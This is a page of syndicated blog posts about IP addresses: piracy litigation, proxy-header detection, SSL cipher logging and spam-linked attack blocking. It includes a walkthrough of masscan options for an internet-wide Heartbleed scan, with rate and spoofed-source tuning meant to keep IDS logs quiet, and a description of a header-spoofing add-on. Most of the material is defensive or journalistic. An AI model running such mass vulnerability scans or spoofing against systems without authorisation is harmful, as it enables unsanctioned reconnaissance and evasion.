Posts tagged ‘ip address’

TorrentFreak: Lawfirm Chasing Aussie ‘Pirates’ Discredited IP Address Evidence

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

There are many explanations for the existence of online piracy, from content not being made available quickly enough to it being sold at ripoff prices. Unfortunately for Australians, over the years most of these complaints have had some basis in fact.

The country is currently grappling with its piracy issues and while there’s hardly a consensus of opinion right now, most of the region’s rightsholders feel that suing the general public isn’t the way to go. It’s painful for everyone involved and doesn’t solve the problem.

That said, US-based Dallas Buyers Club LLC are not of the same opinion. They care about money and to that end they’re now attempting to obtain the identities of iiNet users for the purpose of extracting cash settlements from them.

Yesterday additional information on the case became available. An Optus spokeswoman told SMH that it had been contacted by Dallas Buyers Club about handing over subscriber data but its legal representatives had backed off when it was denied. The movie outfit didn’t even try with Telstra – but why?

So-called copyright trolls like the easiest possible fight and through iiNet they know their adversaries just that little bit better. According to Anny Slater of Slaters Intellectual Property Lawyers, documents revealed in the ISP’s earlier fight with Village Roadshow show that Telstra could well be a more difficult target for discovery.

The business model employed by plaintiffs such as Dallas Buyers Club LLC (DBCLLC) requires a minimum of ‘difficult’, since difficulties increase costs and decrease profits. To that end, part of the job of keeping things straightforward will fall to DBCLLC’s lawfirm, Sydney-based Marque Lawyers.

Unfortunately for DBCLLC, Marque Lawyers have already shot themselves in the foot when it comes to convincing DBCLLC’s “pirate” targets to “pay up or else.”

In 2012, Marque published a paper titled “It wasn’t me, it was my flatmate! – a defence to copyright infringement?” which detailed the company’s stance on file-sharing accusations. The publication provided a short summary of cases in the US where porn companies were aiming to find out the identities of people who had downloaded their films, just as Dallas Buyers Club – Marque’s clients – are doing now.

“To find out the actual identities of the users, the [porn companies] asked the Court to force the ISPs to reveal the names and addresses of each of the subscribers to which the IP addresses related. The users went on the attack and won,” Marque explained.

And here’s the line all potential targets of Dallas Buyers Club and Marque Lawyers should be aware of – from the lawfirm’s own collective mouth.

“The judge, rightly in our view, agreed with the users that just because an IP address is in one person’s name, it does not mean that that person was the one who illegally downloaded the porn.

As the judge said, an IP address does not necessarily identify a person and so you can’t be sure that the person who pays for a service has necessarily infringed copyright.

This decision makes a lot of sense to us. If it holds up, copyright
owners will need to be a whole lot more savvy about how they identify and pursue copyright infringers and, perhaps, we’ve seen the end of the mass ‘John Doe’ litigation.”

So there you have it. Marque Lawyers do not have faith in the IP address-based evidence used in mass file-sharing litigation. In fact, they predict that weaknesses in IP address evidence might even signal the end of mass lawsuits.

Sadly they weren’t right in their latter prediction, as their partnership with Dallas Buyers Club reveals. Still, their stance that the evidence is weak remains and will probably come back to bite them.

The document is available for download from Marque’s own server. Any bill payers wrongly accused of piracy by the company in the future may like to refer the lawfirm to its own literature as part of their response.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: By Proxy

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

As I tweak and tune the firewall and IDS system at FotoForensics, I keep coming across unexpected challenges and findings. One of the challenges is related to proxies. If a user uploads prohibited content from a proxy, then my current system bans the entire proxy. An ideal solution would only ban the user.

Proxies serve a lot of different purposes. Most people think about proxies in regards to anonymity, like the TOR network. TOR is a series of proxies that ensure that the endpoint cannot identify the starting point.

However, there are other uses for proxies. Corporations frequently have a set of proxies for handling network traffic. This allows them to scan all network traffic for potential malware. It’s a great solution for mitigating the risk from one user getting a virus and passing it to everyone in the network.

Some governments run proxies as a means to filter content. China and Syria come to mind. China has a custom solution that has been dubbed the “Great Firewall of China”. They use it to restrict site access and filter content. Syria, on the other hand, appears to use a COTS (commercial off-the-shelf) solution. In my web logs, most traffic from Syria comes through Blue Coat ProxySG systems.

And then there are the proxies that are used to bypass usage limits. For example, your hotel may charge for Internet access. If there’s a tech convention in the hotel, then it’s common to see one person pay for the access, and then run his own SOCKS proxy for everyone else to relay out over the network. This gives everyone access without needing everyone to pay for the access.

Proxy Services

Proxy networks that are designed for anonymity typically don’t leak anything. If I ban a TOR node, then that node stays banned since I cannot identify individual users. However, the proxies that are designed for access typically do reveal something about the user. In fact, many proxies explicitly identify whose request is being relayed. This added information is stuffed in HTTP header fields that most web sites ignore.

For example, I recently received an HTTP request from that contained the HTTP header “X-Forwarded-For:”. If I were to ban the user, then I would ban “”, since that system connected to my server. However, is and is part of a proxy network. This proxy network identified who was being relayed with the X-Forwarded-For header. In this case, “” is someone in Yemen. If I see this reference, then I can start banning the user in Yemen rather than the Google Proxy that is used by lots of people. (NOTE: I changed the Yemen IP address for privacy, and this user didn’t upload anything requiring a ban; this is just an example.)

Unfortunately, there is no real standard here. Different proxies use different methods to denote the user being relayed. I’ve seen headers like “X-Forwarded”, “X-Forwarded-For”, “HTTP_X_FORWARDED_FOR” (yes, they actually sent this in their header; this is NOT from the Apache variable), “Forwarded”, “Forwarded-For-IP”, “Via”, and more. Unless I know to look for it, I’m liable to ban a proxy rather than a user.

In some cases, I see the direct connection address also listed as the relayed address; it claims to be relaying itself. I suspect that this is caused by some kind of anti-virus system that is filtering network traffic through a local proxy. And sometimes I see private addresses (“private” as in “private use” and “should not be routed over the Internet”; not “don’t tell anyone”). These are likely home users or small companies that run a proxy for all of the computers on their local networks.
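Pulling these observations together, the relay-extraction logic can be sketched in a few lines of Python. This is a minimal illustration, not the site's actual code; the header list, the function name, and the fall-back-to-the-connecting-address policy are all my own assumptions:

```python
import ipaddress

# Candidate relay headers seen in the wild (per the list above);
# real proxies use many more variants than this.
FORWARD_HEADERS = [
    "X-Forwarded-For", "X-Forwarded", "Forwarded-For-IP",
    "HTTP_X_FORWARDED_FOR", "Forwarded", "Via",
]

def relayed_client(headers, connect_ip):
    """Best guess at the relayed client address; falls back to the
    directly connecting address when no usable hint is present."""
    for name in FORWARD_HEADERS:
        value = headers.get(name)
        if not value:
            continue
        # X-Forwarded-For can carry a chain: "client, proxy1, proxy2".
        candidate = value.split(",")[0].strip()
        try:
            addr = ipaddress.ip_address(candidate)
        except ValueError:
            continue  # "Via" and similar headers often hold non-IP data
        # Skip self-relays and private-use addresses: both point back
        # at the proxy's own network rather than at the remote user.
        if candidate == connect_ip or addr.is_private:
            continue
        return candidate
    return connect_ip
```

When a request arrives through a proxy that fills in a public client address, the function returns that client; when the headers are missing, self-referencing, or point at a private network, the proxy's own address is all there is left to ban.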

Proxy Detection

If I cannot identify the user being proxied, then just identifying that the system is a proxy can be useful. Rather than banning known proxies for three months, I might ban the proxy for only a day or a week. The reduced time should cut down on the number of people blocked because of the proxy that they used.

There are unique headers that can identify that a proxy is present. Blue Coat ProxySG, for example, adds in a unique header: “X-BlueCoat-Via: abce6cd5a6733123”. This tracking ID is unique to the Blue Coat system; every user relaying through that specific proxy gets the same unique ID. It is intended to prevent looping between Blue Coat devices. If the ProxySG system sees its own unique ID, then it has identified a loop.

Blue Coat is not the only vendor with its own proxy identifier. Fortinet’s software adds in an “X-FCCKV2” header. And Verizon silently adds in an “X-UIDH” header that has a large binary string for tracking users.
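Even when only the proxy itself is identifiable, its presence can drive the shorter-ban policy described above. A hypothetical sketch, where both the marker set and the durations are my own illustrative choices:

```python
# Headers whose presence marks the sender as some kind of proxy.
# The vendor-specific ones are from the examples above; this set is
# nowhere near complete.
PROXY_MARKERS = {
    "X-BlueCoat-Via",   # Blue Coat ProxySG loop-detection ID
    "X-FCCKV2",         # Fortinet
    "X-UIDH",           # Verizon user-tracking header
    "Via",
    "X-Forwarded-For",
}

def ban_days(headers):
    """Hypothetical policy: a short ban for shared proxies (to limit
    collateral damage), a long one for direct connections."""
    if any(name in headers for name in PROXY_MARKERS):
        return 7    # a week instead of three months
    return 90
```

So a request carrying `X-BlueCoat-Via` would earn its address a week-long ban, while a bare direct connection gets the full three months.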

Language and Location

Besides identifying proxies, I can also identify the user’s preferred language.

The intent with specifying languages in the HTTP header is to help web sites present content in the native language. If my site supports English, German, and French, then seeing a hint that says “French” should help me automatically render the page using French. However, this can be used along with IP address geolocation to identify potential proxies. If the IP address traces to Australia but the user appears to speak Italian, then it increases the likelihood that I’m seeing an Australian proxy that is relaying for a user in Italy.

The official way to identify the user’s language is to use an HTTP “Accept-Language” header. For example, “Accept-Language: en-US,en;q=0.5” says to use the United States dialect of English, or just English if there is no dialect support at the web site. However, there are unofficial approaches to specifying the desired language. For example, many web browsers encode the user’s preferred language into the HTTP user-agent string.
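Parsing the official header is straightforward. A small sketch (my own, with deliberately simplified q-value handling) that orders the tags by preference:

```python
def parse_accept_language(value):
    """Turn an Accept-Language value into (tag, q) pairs,
    most-preferred first. Simplified: malformed parts are skipped."""
    langs = []
    for part in value.split(","):
        piece = part.strip()
        if not piece:
            continue
        tag, _, q = piece.partition(";q=")
        try:
            weight = float(q) if q else 1.0  # a missing q-value means q=1
        except ValueError:
            continue
        langs.append((tag.strip(), weight))
    # Python's sort is stable, so equal weights keep their header order.
    return sorted(langs, key=lambda item: -item[1])
```

For “en-US,en;q=0.5” this yields `[("en-US", 1.0), ("en", 0.5)]`: US English first, plain English as the fallback.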

Similarly, Facebook can relay network requests. These appear in the header “X-Facebook-Locale”. This is an unofficial way to identify when Facebook is being used as a proxy. However, it also tells me the user’s preferred language: “X-Facebook-Locale: fr_CA”. In this case, the user prefers the Canadian dialect of French (fr_CA). While the user may be located anywhere in the world, he is probably in Canada.

There’s only one standard way to specify the recipient’s language. However, there are lots of common non-standard ways. Just knowing what to look for can be a problem. But the bigger problem happens when you see conflicting language definitions.

Accept-Language: de-de,de;q=0.5

User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; it-it; SAMSUNG SM-G900F/G900FXXU1ANH4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36

X-Facebook-Locale: es_LA

x-avantgo-clientlanguage: en_GB

x-ucbrowser-ua: pf(Symbian);er(U);la(en-US);up(U2/1.0.0);re(U2/1.0.0);dv(NOKIAE90);pr

X-OperaMini-Phone-UA: Mozilla/5.0 (Linux; U; Android 4.4.2; id-id; SM-G900T Build/id=KOT49H.G900SKSU1ANCE) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

If I see all of these in one request, then I’ll probably choose the official header first (German from German). However, without the official header, would I choose Spanish from Latin America (“es-LA” is unofficial but widely used), Italian from Italy (it-it) as specified by the web browser user-agent string, or the language from one of those other fields? (Fortunately, in the real world these would likely all be the same. And you’re unlikely to see most of these fields together. Still, I have seen some conflicting fields.)

Time to Program!

So far, I have identified nearly a dozen different HTTP headers that denote some kind of proxy. Some of them identify the user behind the proxy, but others leak clues or only indicate that a proxy was used. All of this can be useful for determining how to handle a ban after someone violates my site’s terms of service, even if I don’t know who is behind the proxy.

In the near future, I should be able to identify at least some of these proxies. If I can identify the people using proxies, then I can restrict access to the user rather than the entire proxy. And if I can at least identify the proxy, then I can still try to lessen the impact for other users.

SANS Internet Storm Center, InfoCON: green: Logging SSL, (Thu, Oct 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

With POODLE behind us, it is time to get ready for the next SSL fire drill. One of the questions that keeps coming up is which ciphers and SSL/TLS versions are actually in use. Whether or not you decide to turn off SSLv3 depends a lot on who needs it, and it is an important answer to have ready should some other cipher turn out to be too weak tomorrow.

But keep in mind that it is not just numbers that matter. You also need to figure out who the outliers are and how important (or dangerous?) they are. So as a good start, try to figure out how to log SSL/TLS versions and ciphers. There are a couple of options to do this:

In Apache, you can log the protocol version and cipher easily by logging the respective environment variables [1]. For example:
CustomLog logs/ssl_request_log "%t %h \"%{User-agent}i\" %{SSL_PROTOCOL}x %{SSL_CIPHER}x"

Logs SSL protocol and cipher. You can add this to an existing access log, or create a new log. If you decide to log this in its own log, I suggest you add User-Agent and IP Address (as well as time stamp).

In nginx, you can do the same by adding $ssl_cipher and $ssl_protocol to the log_format directive in your nginx configuration. For example:

log_format ssl '$remote_addr "$http_user_agent" $ssl_cipher $ssl_protocol';

This should give you a result similar to the Apache example above.

If you have a packet sniffer in place, you can also use tshark to extract the data. With tshark, you can actually get a bit further: you can log the client hello with whatever ciphers the client proposed, and the server hello which will indicate what cipher the server picked.

tshark -r ssl -2R "ssl.handshake.type==2 or ssl.handshake.type==1" -T fields -e ssl.handshake.type -e ssl.record.version -e ssl.handshake.version -e ssl.handshake.ciphersuite

For extra credit log the host name requested in the client hello via SNI and compare it to the actual host name the client connects to.

Now you can not only collect real data as to what ciphers are needed, but you can also look for anomalies. For example, user agents that request very different ciphers than other connections that claim to originate from the same user agent. Or who is asking for weak ciphers? Maybe a sign of an SSL downgrade attack? Or an attack tool using an older SSL library…


Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Anti-Piracy Group Plans to Block In Excess of 100 Sites

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

When copyright holders turn to the courts for a solution to their problems it’s very rare that dealing with one site, service or individual is the long-term aim. Legal actions are designed to send a message and important decisions in rightsholders’ favor often open the floodgates for yet more action.

This is illustrated perfectly by the march towards large-scale website blocking in several regions around the world.

A topic pushed off the agenda in the United States following the SOPA debacle, web blockades are especially alive and well in Europe, and living proof that while The Pirate Bay might be the initial target of Hollywood and the record labels, much bigger plans have always been in store.

A typical example is now emerging in Austria. Having spent years trying to have streaming sites, and Movie4K blocked at the ISP level, anti-piracy group VAP has just achieved its aims. Several key local ISPs began blocking the sites this month but the Hollywood-affiliated group has now admitted that it has had bigger plans in mind all along.

Speaking with DerStandard, VAP CEO Werner Müller has confirmed that his group will now work to have large numbers of additional sites banned at the ISP level.

Borrowing a term often used by Dutch anti-piracy group BREIN, Müller says his group has compiled a list of sites considered by the movie industry to be “structurally infringing”. The sites are expected to be the leaders in the torrent, linking and streaming sectors, cyberlockers included. IFPI has already confirmed it will be dealing with The Pirate Bay and two other sites.

The VAP CEO wouldn’t be drawn on exact numbers, but did confirm that a “low three digit” number of domains are in the crosshairs for legal action.

Although Austria is in the relatively early stages, a similar situation has played out in the UK, with rightsholders obtaining blocks against some of the more famous sites and then streamlining the process to add new sites whenever they see fit. Dozens of sites are now unavailable by regular means.

If VAP has its way the blockades in Austria will be marginally broader than those in the UK, covering the country’s eight largest service providers and affecting around 95% of subscribers.

Of course, whenever web blockades are mentioned the topic of discussion turns to circumvention. In Austria the blockades are relatively weak, with only DNS-based mitigation measures in place. However, VAP predicts the inevitable expansion towards both DNS and IP address blocking and intends to head off to court yet again to force ISPs to implement them.

Describing the Internet as a “great machine” with both good and bad sides, Müller says that when ordering website blocks the courts will always take the right to freedom of expression into account.

“But there’s no human right to Bruce Willis,” he concludes.


TorrentFreak: Gottfrid Svartholm Hacking Trial Nears Conclusion

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

The hacking trial of Gottfrid Svartholm and his alleged 21-year-old Danish accomplice concluded this week in Copenhagen, Denmark. Gottfrid is best known as one of the founders of The Pirate Bay, but his co-defendant’s identity is still being kept out of the media.

The sessions this week, on October 7 and 10, were used for summing up by the prosecution and defense. Danish language publication, which has provided good coverage of the whole trial, reports that deputy prosecutor Anders Riisager used an analogy to describe their position on Gottfrid.

Prosecution: Hands in the cookie jar

“If there is a cookie jar on the table with the lid removed, and your son is sitting on the sofa with cookie crumbs on his mouth, it is only reasonable to assume that it is he who has had his paws in the cookie jar,” he said.

“This, even though he claims it is four of his friends who have put the cookies into his mouth. And especially when the son will not reveal who his friends are, or how it happened.”

Riisager was referring to the evidence presented by the prosecution that Gottfrid and his co-defendant were the people behind hacker attacks on IT company CSC which began in 2012.

The Swede insists that while the attack may have been carried out from his computer, the computer itself was used remotely by other individuals, any of whom could have carried out the attacks. Leads and names provided by Gottfrid apparently led the investigation nowhere useful.

Remote access unlikely

That third-parties accessed Gottfrid’s computer without his knowledge is a notion rejected by the prosecution. Noting that the Pirate Bay founder is a computer genius, senior prosecutor Maria Cingari said that maintaining secret access to his machine over extended periods would not have been possible.

“It is not likely that others have used [Gottfrid's] computer to hack CSC without him discovering something. At the same time the hack occurred over such a long time that remote control is unlikely,” she said.

And, Cingari noted, it was no coincidence that chatlogs found on Gottfrid’s computer related to so-called “zero-day” vulnerabilities and the type of computer systems used by CSC.

Dane and Swede working together

In respect of Gottfrid’s co-defendant, the prosecution said that the 21-year-old Dane knew that when he was speaking online with a user known as My Evil Twin (allegedly Gottfrid), the plan was a hacker attack on CSC.

Supporting their allegations of collusion, the prosecution noted that the Dane had been living in Cambodia when the attacks on CSC began and while a hacker attack against Logica, a crime for which Gottfrid was previously sentenced, was also underway. The Dane spent time in a café situated directly under Gottfrid’s apartment, the prosecution said.

Why not hand over the encryption keys?

When police raided the Dane they obtained a laptop, the contents of which still remain a secret due to the presence of heavy encryption. The police found a hollowed-out chess piece containing the computer’s SD card key, but that didn’t help them gain access. Despite several requests, the 21-year-old has refused to provide keys to unlock the data on the Qubes OS device, arguing there is nothing on there of significance. According to the prosecution, this is a sign of guilt.

“It is very striking that one chooses to sit in prison for a year and more, instead of just helping the police with access to the laptop so they can see that it contains nothing,” senior prosecutor Maria Cingari said.

Cingari also pointed the finger at the Dane for focusing Gottfrid’s attention on CSC.

“You can see that [the Dane] has very much helped [Gottfrid] with obtaining access to CSC’s mainframe. It is not even clear that he would have set his sights on CSC, if it had not been for [the Dane],” she said.

Defense: No objectivity

On Friday, defense lawyer Luise Høj began her closing arguments with fierce criticism of a Danish prosecution that uncritically accepted evidence provided by Swedish police and failed to conduct an objective inquiry.

“They took a plane to Stockholm and were given some material. It was placed in a bag and they took the plane back home. From there they went to CSC and asked them to look for clues. This shows a lack of an independent approach to the evidence,” she said.

Furthermore, the mere fact that CSC had been investigating itself under direction of the police was also problematic.

“The victim should not investigate itself. CSC is at risk of being fired as the state’s IT provider,” Høj noted.

Technical doubt

Computer technicians presented by both sides, including famous security expert Jacob Appelbaum, failed to agree on whether remote access had been a possibility, but this in itself should sway the court to acquit, Høj said.

“It must be really difficult for the court to decide whether the computer was controlled remotely or not, when even engineers disagree on what has happened,” she noted.

Why not take time to investigate properly?

Høj also took aim at the police who she said had failed to properly investigate the people Gottfrid had previously indicated might be responsible for the hacker attacks.

“My client has in good faith attempted to come up with some suggestions as to how his computer was remotely controlled. Of course he did not provide a complete explanation of how it happened, as he did not know what had happened and he has not had the opportunity to examine his computer,” she said.

Additionally, clues that could’ve led somewhere were overlooked, the defense lawyer argued. For instance, an IP address found in CSC’s logs was traced back to a famous Swedish hacker known as ‘MG’.

“The investigation was not objective. I do not understand why it’s not possible to investigate clues that don’t take much effort to investigate,” Høj said. “The willingness to investigate clues that do not speak in favor of the police case has been minimal.”

A decision in the case is expected at the end of the month. If found guilty, Gottfrid faces up to four years in jail.


The Hacker Factor Blog: Bellwether

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

For the last few months, I have been seeing a huge up-tick on two kinds of traffic: spam and network attacks. Over the last few weeks, I have realized that they are directly related.

“I don’t want any SPAM!” — Monty Python

I used to take pride in my ability to stay off spam mailing lists. For over 12 years, I averaged 4-8 spam messages per day without using any kind of mail filter. That all changed earlier this year, when I suddenly began getting about 50 undesirable emails per day. That’s when I first enabled the commonly used mail filter called spamassassin.

Although spamassassin reduced the flood by 50%, some spam still got through. Meanwhile the amount of spam dramatically increased from 50 messages per day to 500 or more per day. I tweaked a couple of the spamassassin rules and added in some procmail rules at the final mailbox. Now I’m down to a few hundred per day getting past spamassassin and about 10 per day that make it past my procmail rules.

The good news is that I am very confident that I am not losing any legitimate emails. The bad news is that spammers seem to be seriously upping the volume since at least March of this year.

Each time I register with a new online service, I try to use a different email address. This way, if any service I use has its list acquired by spammers, then I know which service caused the problem. Unfortunately, most of these messages are not going to my service-specific addresses. Instead, they are going to one of my three primary accounts that I give out to people. I suspect that someone I know got infected and had their address list stolen.

These high-volume spam messages are coming from specific subnets. It appears that 2-3 spam groups are purchasing subnets from small hosting providers and then spamming like crazy until they get shutdown. Moreover, the hosting providers appear to be ignoring complaints and permitting the abuse. So far, I have banned all emails from 191.101.xx.xx, 192.3.xx.xx, 103.252.xx.xx, 204.15.135.xx, and 209.95.38.xx. These account for over 800 emails to me over the last month.

I’m not the only person seeing this large increase in spam. There have been similar reports at forums like Symantec and Ars Technica. According to Cisco, spam has increased more than 3x since 2013.

“Oh, what a tangled web we weave when first we practise to deceive!” — Walter Scott

Coinciding with the increase in spam is an increase in web attacks. I have seen nearly a 3x increase in web-based scans and attacks in the last year. Because of this, I have added additional filters to identify these attacks and block the offending addresses.

Using data collected at FotoForensics, I began to look up the banned IP addresses using over 30 different DNSBL sites. About 40% of the time, the address is already associated with suspicious web activity (e.g., port scanning and attacks), and 70% of the time it is already associated with spam.

I have graphed out the attackers over the last 75 days. The size of the dot represents the percent of traffic. Red denotes cities and yellow denotes countries (when the city is unknown). Mousing-over the picture shows the per-country distribution.

Since I am blocking access immediately, there is only one attack recorded per IP address. If a city or country has multiple sightings, then those are multiple addresses that geolocated to the same city/country.

Although the United States generates the largest number of network attacks, they really come from cities all over the place. There is no central city. The eight cities that generate the most attacks are Hanoi (Vietnam), Fuzhou (China), Guangzhou (China), Bangkok (Thailand), Nanjing (China), Taipei (Taiwan), Istanbul (Turkey), and Chongqing (China).

The top 10 countries that have attacked my sites are: USA (with 70 sightings), China (62), Germany (42), Ukraine, Thailand, Vietnam, South Korea, India, Taiwan, and Turkey.

Most of these attacks appear to come from subnets. For example, Hetzner Online AG (AS24940) has two subnets that are explicitly used for network attacks: – and – Every IP address in these ranges has explicitly conducted a web-based attack against my server.

By detecting these attacks and blocking access immediately, I’ve seen one other side-effect: a huge (20%) drop in volume from other network addresses. The attacks that I am blocking appear to be bellwethers; if these attacks are not blocked then others will follow. Blocking the bellwether stops the subsequent scans and attacks from other network addresses. This theory was easy enough to test: rather than banning, I just recorded a few of the network attacks and allowed them to continue. This resulted in an increase in attacks from other countries and subnets. Blocking the attacks caused a direct drop in hostile traffic from all over the place.

“Coincidence is God’s way of remaining anonymous.” — Albert Einstein

While I was collecting information on attackers, I tested a few other types of online tracking. For example, it is easy enough for my server to identify if the recipient is using an anonymizing network. I wanted to see if attacks correlated with these systems. Amazingly, the distribution of attacks from anonymous proxies is not significantly different from non-proxy addresses. I could find no correlation.

Here are the locations of detected anonymizers that accessed my site. This also includes botnets that distribute links to scan across network addresses. Again, each IP address is only counted once:

When it comes to anonymity, we’re mapping the anonymous exit address to a location. With TOR users, you may be physically in France but using an address in Australia. We would count it as Australia and not France. Amazingly, there are not many TOR nodes in this graph. (Probably because many TOR nodes have been banned for being involved in network attacks.)

In these maps, you’ll also notice a yellow dot in the water off the west coast of Africa. That’s latitude,longitude “0,0” and denotes addresses that cannot be mapped back to countries. These are completely anonymous servers and satellite providers. (But keep in mind: just because your server cannot be geolocated, it does not mean that you are truly anonymous.)

The big dots in California are from Google and Microsoft. Their bots appear because they constantly change addresses (like TOR users). The big dot in Japan is Trend Micro. However, the single biggest group of anonymity users are in Saudi Arabia. They change addresses and anonymize HTTP headers like crazy! Asia is also really big on anonymizing systems. I assume that this is because their users are either trying to bypass government filters or are unaware that their traffic is being hijacked by government filters. In contrast, Germany and Poland appear big due to the sheer number of TOR nodes.

Finally, I tried to correlate the use of network attacks or anonymity systems to people who upload prohibited content to FotoForensics.

There is really no correlation at all. The more conservative areas, like Saudi Arabia, most of the Middle East, and Asia, rarely upload pornography, nudity, or sexually explicit content. In contrast, the United States and Europe really like their porn. (Germany is mostly due to the >_ forum that I previously mentioned. Even when shown a warning that they are about to be banned, nearly 80% of the time they consciously choose to continue and get banned. Idiots.)

“It is madness for sheep to talk peace with a wolf.” — Thomas Fuller

Actively blocking the initial bellwether network scans dramatically reduces the number of follow-up attacks. Overall, I see a significant drop in scans, harvesters, and even comment spammers. Since these addresses are also associated with unsolicited email, immediately stopping them from accessing the web server should result in an immediate drop in the volume of spam.

I have since deployed my blocking technology. In the last four days, it blocked over 300 network addresses that were scanning for vulnerabilities, uploading comment spam, and searching for network addresses.

However, these are very small web sites compared to most other online services, so any impact from my own blocking is likely to be insignificant across the whole world. Still, it does demonstrate one finding related to spam: there is a direct correlation between web-based scans and attacks and systems that generate spam emails. If big companies temporarily blocked access when a hostile scan is detected, the overall volume of spam across the world should drop rapidly.
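The reactive blocking described here can be sketched as follows. The probe paths are illustrative and this is not the author's actual implementation:

```python
# React to the bellwether scan: the first request probing a
# known-vulnerable path gets the source address added to a deny list,
# and every later request from that address is refused.

SCAN_PATHS = {'/phpmyadmin/', '/wp-login.php', '/cgi-bin/test.cgi'}  # illustrative
blocked = set()

def handle_request(ip, path):
    if ip in blocked:
        return 403                  # already on the deny list
    if path in SCAN_PATHS:
        blocked.add(ip)             # bellwether scan detected: block now
        return 403
    return 200
```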

Darknet - The Darkside: IPFlood – Simple Firefox Add-on To Hide Your IP Address

This post was syndicated from: Darknet - The Darkside and was written by: Darknet. Original post: at Darknet - The Darkside

IPFlood (previously IPFuck) is a Firefox add-on created to simulate the use of a proxy. It doesn’t actually change your IP address (obviously) and it doesn’t connect to a proxy either, it just changes the headers (that it can) so it appears to any web servers or software sniffing – that you are in fact [...]
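Based on that description, the add-on's technique amounts to attaching proxy-style headers carrying a fabricated client address; the exact header names IPFlood rewrites are an assumption here:

```python
import random

# The real client IP never changes; proxy-style headers with a random
# fake address are attached so naive servers log the wrong "client".

def fake_proxy_headers():
    fake_ip = '.'.join(str(random.randint(1, 254)) for _ in range(4))
    return {
        'X-Forwarded-For': fake_ip,   # what naive servers treat as the client
        'Client-IP': fake_ip,
        'Via': '1.1 ' + fake_ip,      # pretend a proxy relayed the request
    }
```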

The post IPFlood…

Read the full post at

Errata Security: Six-month anniversary scan for Heartbleed

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

I just launched my six-month anniversary scan for Heartbleed. I’ll start reporting early results tomorrow afternoon. I’m dialing the scan to run slowly and spreading it across four IP addresses (and 32k ports) in order to avoid unduly alarming people.

If you would like the results of the scan for your subnet, send your address ranges to our “abuse@” email address. We’ll look up the abuse contact email for those ranges and send you what we found for that range. (This offer is good through the end of October 2014.)

Here is a discussion of the options.

–conf /etc/masscan/masscan.conf
You don’t see this option, but it’s the default. This is where we have the ‘excluderanges’ configured. Because we exclude everyone who contacts us and opts out of our white-hat scans, we are down to scanning only 3.5 billion hosts now, out of around 4 billion.
The “/0″ means “the entire Internet”. Actually, any valid IPv4 address can appear before the “/0″ and it’ll produce the same results, such as using your own address to amuse your friends.
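For reference, a masscan.conf carrying these defaults might look something like this (a sketch only; the real exclude list and values are private):

```
# /etc/masscan/masscan.conf (hypothetical sketch)
# Ranges whose owners opted out of the white-hat scans:
excludefile = /etc/masscan/exclude.txt

# Hourly log rotation, described later in this post:
rotate = hourly
rotate-dir = /var/log/masscan
```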

-p443
This says to scan on port 443, the default SSL port. At some point in the future, I’ll scan for some other common SSL ports, including the STARTTLS ports like port 25.

–banners
This means to create a full TCP connection with the system and grab the “banner” info. In this case, that means sending an SSL “hello” request and parsing the received X.509 certificate to dump the hostname from it.

–capture cert
This means to also capture the X.509 certificate. I don’t really care for this scan, but on general principles, grabbing certificates is good for other SSL research. This happens before the heartbleed check.

–heartbleed
This means that after the initial SSL hello, it will attempt a “Heartbleed” request. In this case, the returned information will just be a “VULN: [Heartbleed]” message for the IP address. If you want more, then “–capture heartbleed” can also be used to grab the “bleeding” information. I don’t do that.

-oB heartbleed.scan
This means to save the results in a binary file called “heartbleed.scan”. This is the custom masscan format that can be read using the –readscan option later to convert to XML, JSON, and other output formats. I always scan using this format, but I think I’m the only one.

–rotate-dir /var/log/masscan
You don’t see it here on the command-line because it’s in masscan.conf (see above), but every hour the contents of “heartbleed.scan” are rotated into this directory and a new file created. That file is timestamped with the current time.

–rotate hourly
You don’t see it here, but it’s in masscan.conf. This means that rotation to /var/log/masscan should happen every hour on the hour. If you start a scan at 1:55, it’ll be rotated at 2:00. It renames the file with the timestamp as the prefix, like 141007-020000-heartbleed.scan, so having it aligned to an even hour makes things easier to work with. Note that “minutely” and “daily” are also supported.

–rate 80000
People don’t like getting scanned too fast; it makes IDS and firewall logs unhappy. Therefore, I lower the rate to only 80,000 packets/second to reduce the strain. Consequently, the scan will take about 13 hours to complete.

On the same principle as slowing the rate, spreading the scan across multiple source IP addresses makes IDS/firewalls squawk less, and makes people less unhappy. We have only a small range to play with, so I’m only using 4 IP addresses. Note that masscan has its own TCP/IP stack — it’s “spoofing” these IP addresses; no machine actually exists at them. If you try to ping them, you’ll get no response. This is the best way to run masscan, though people still find it confusing.

–source-port 32768-65535
By default, masscan uses a randomly assigned source port. I prefer to use a range of source ports.
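Putting the pieces together, the full invocation probably looked something like the following. This is a reconstruction from the descriptions above, not a command copied from the post, and the spoofed source addresses are omitted because they were never published:

```
masscan 0.0.0.0/0 -p443 --banners --heartbleed \
        --capture cert -oB heartbleed.scan \
        --rate 80000 --source-port 32768-65535
# --conf /etc/masscan/masscan.conf is read implicitly and supplies the
# excluded ranges, the source addresses, and the hourly log rotation.
```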

The Hacker Factor Blog: Downward Trend

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

Over the last few months, I have been enhancing my network defenses at FotoForensics. It is no longer enough to just block bad actors. I want to know who is attacking me, what their approach is, and anything else about them. I want to “know my enemy”.

To gain more knowledge, I’ve begun to incorporate DNS blacklist data. There are dozens of servers out there that use DNS to query various non-network databases. Rather than resolving a hostname to a network address, they encode an address in the hostname and return a code that denotes the type of threat.

